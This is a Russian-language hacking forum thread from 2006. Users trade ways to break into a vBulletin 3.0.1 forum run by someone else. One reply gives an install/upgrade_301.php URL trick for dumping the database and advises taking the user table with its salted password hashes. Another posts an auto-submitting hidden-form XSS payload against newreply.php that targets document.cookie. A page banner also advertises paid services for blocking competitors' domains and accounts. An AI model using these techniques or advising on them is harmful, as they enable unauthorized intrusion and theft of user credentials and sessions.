Вопрос про уязвимости в vbulletin 3.0.1

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Вопрос про уязвимости в vbulletin 3.0.1

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Вопрос про уязвимости в vbulletin 3.0.1

03.08.2006, 20:52

Manoz

Познающий

Регистрация: 15.02.2005

Сообщений: 39

С нами: 11175364

Репутация: 7

Вопрос про уязвимости в vbulletin 3.0.1

Есть форум с vb 3.0.1. Какие уязвимости у него есть? А то тут старые посты стерли и не могу найти инфу.
Спасиб

𝕏 Twitter Reddit Telegram Копировать ссылку

03.08.2006, 21:12

max_pain89

Постоянный

Регистрация: 11.12.2004

Сообщений: 592

С нами: 11269766

Репутация: 345

скорее всего это фэйк, версию намерено изменили и скрывают..... хотя хз

03.08.2006, 22:01

LoneWolf666

Постоянный

Регистрация: 09.12.2005

Сообщений: 377

С нами: 10747046

Репутация: 362

www.site forumpath*.domen/install/upgrade_301.php?step=SomeWord
Возможность сделать дамп базы.
Относительно стабильно работает на 3.0.1.

*либо www.forum.site.domen либо www.site.domen/forum/...
Попробуй.
Хеши - солёные. Соль - последния столбец таблицы.
Если покатит - советую делать дамп таблицы user (мэйби vb_user)
Будет проще, меньше размером, да и нах тебе остальное?

08.08.2006, 20:24

Manoz

Познающий

Регистрация: 15.02.2005

Сообщений: 39

С нами: 11175364

Репутация: 7

Ща попробую! Спасибо за инфу! ++

Эх жалко. Действительно 3.0.1 мулька. =(

Последний раз редактировалось Manoz; 08.08.2006 в 20:29..

08.08.2006, 21:20

BlackCats

Постоянный

Регистрация: 01.02.2006

Сообщений: 970

С нами: 10669286

Репутация: 1942

а так чаще всего =))) просто нусам подумай, у кого может стоять такие древние форумы?? =))) они обычно сами орут "ВЫШЛА НОВАЯ ВЕРСИЯ УСТАНОВИТЕ!"

09.11.2006, 19:42

JIaMo

Новичок

Регистрация: 24.09.2006

Сообщений: 10

С нами: 10330385

Репутация: 1

а есть тут еще уязвимости??

09.11.2006, 20:11

_Great_

Флудер

Регистрация: 27.12.2005

Сообщений: 2,372

С нами: 10721066

Репутация: 4360

где тут? в этой версии?

10.11.2006, 19:16

_GaLs_

Постоянный

Регистрация: 21.04.2006

Сообщений: 540

С нами: 10555586

Репутация: 726

Цитата:

Сообщение от JIaMo

а есть тут еще уязвимости??

Программа: vBulletin 3.0.1

Опасность: Низкая

Наличие эксплоита: Да

Описание: Обнаружена уязвимость в vBulletin. Удаленный атакующий может получить доступ к важной информации пользователей.

Пример/Эксплоит:

<form action="http://host/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="<IMG src="javascript:alert(document.cookie)"& gt;"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
<script>
document.all.preview.click();
</script>

10.11.2006, 21:51

JIaMo

Новичок

Регистрация: 24.09.2006

Сообщений: 10

С нами: 10330385

Репутация: 1

и че с этим делать?

#10

11.11.2006, 00:41

+toxa+

[Лишённый самовыражени

Регистрация: 16.01.2005

Сообщений: 1,787

С нами: 11217866

Репутация: 3812

Отправить сообщение для +toxa+ с помощью AIM

На хер намотай...

__________________

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Вопрос про уязвимости в FastBB	deo	Уязвимости CMS / форумов	9	29.11.2004 09:47
Вопрос про уязвимости в Vbulletin version 2.2.7	mynhauzen	Уязвимости CMS / форумов	3	04.08.2004 12:14
Вопрос про уязвимости в exbb		Уязвимости CMS / форумов	1	02.08.2004 19:17

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход